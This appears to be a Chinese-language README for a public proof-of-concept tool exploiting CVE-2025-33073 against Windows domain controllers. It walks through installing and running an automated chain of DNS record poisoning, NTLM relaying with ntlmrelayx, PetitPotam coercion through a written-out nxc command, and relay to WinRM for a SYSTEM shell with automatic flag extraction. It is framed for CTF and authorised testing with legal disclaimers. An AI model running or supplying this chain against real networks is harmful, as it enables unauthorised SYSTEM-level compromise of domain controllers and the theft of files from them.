
针对拥有 DNSAdmins 权限并启用 WinRM 的 Windows 域控制器的通用利用工具。
CVE-2025-33073 是一个关键漏洞,攻击者可通过以下组合在 Windows 域控制器上实现 SYSTEM 级代码执行:
此 PoC 提供了一个通用、自动化的利用框架,兼容任何域、任何用户名以及任何 CTF 环境。
# 所需工具
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python 依赖
pip3 install impacket netexec
# 克隆 krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# 克隆本仓库
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# 赋予 exploit 执行权限
chmod +x exploit.sh
# 验证工具安装
./exploit.sh # 将检查所有依赖
./exploit.sh
脚本将询问:
终端 1 - 运行 exploit:
./exploit.sh
# 跟随交互式提示
# 等待: "[!] 中继就绪!请打开新终端 → 粘贴强制认证命令!"
终端 2 - 执行强制认证命令(从终端 1 输出中复制):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
结果:
脚本自动搜索并提取:
*flag*.txt*root*.txt*user*.txtproof.txt所在位置:C:\Users\*\Desktop\
所有输出保存在:/0pwn_exploit_<时间戳>/
relay.log - NTLM 中继服务器输出dns.log - DNS 操作日志shell_output.log - Shell 命令及提取的 flag1. DNS 投毒(krbrelayx.dnstool)
└─> 修改/创建指向攻击者 IP 的 DNS 记录
2. NTLM 中继服务器(ntlmrelayx.py)
└─> 监听传入的 NTLM 认证
3. 强制认证(nxc + PetitPotam)
└─> 强制 DC 向攻击者 IP 进行身份验证
4. 中继 → WinRMS
└─> 将认证中继至目标 WinRMS
5. SYSTEM Shell
└─> 以 SYSTEM 身份执行命令
6. 自动提取 Flag
└─> 搜索并提取所有 flag
在 exploit.sh 中编辑 LONGHOST 变量:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
修改 run_shell_commands() 函数以搜索不同的文件模式:
# 在此添加自定义模式
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
本 PoC 仅用于:
未经授权访问计算机系统是违法的。
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log 中的错误nc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands() 中增加 sleep 超时时间/0pwn_exploit_1234567890/
├── relay.log # NTLM 中继服务器输出
├── dns.log # DNS 操作详情
└── shell_output.log # 提取的 flag 及命令输出
# 查看中继事件
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# 提取所有 flag
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# 检查 DNS 操作
cat /0pwn_exploit_*/dns.log
[Demo & Screenshots] - [即将推出]

0pwn (uziii2208) - 原始概念与研究 AI 增强 - v1.0 改进与自动 flag 提取
MIT 许可证 - 详见 LICENSE 文件
法律声明:
本软件仅用于教育和授权的安全测试目的。未经授权访问计算机系统属于违法行为,并将受到法律制裁。
使用本工具即表示您同意:
欢迎贡献!请提交 issue 和 pull request。
如有问题、疑问或改进建议:
状态:✅ 已测试并验证 版本:1.0(通用版) 最后更新:2025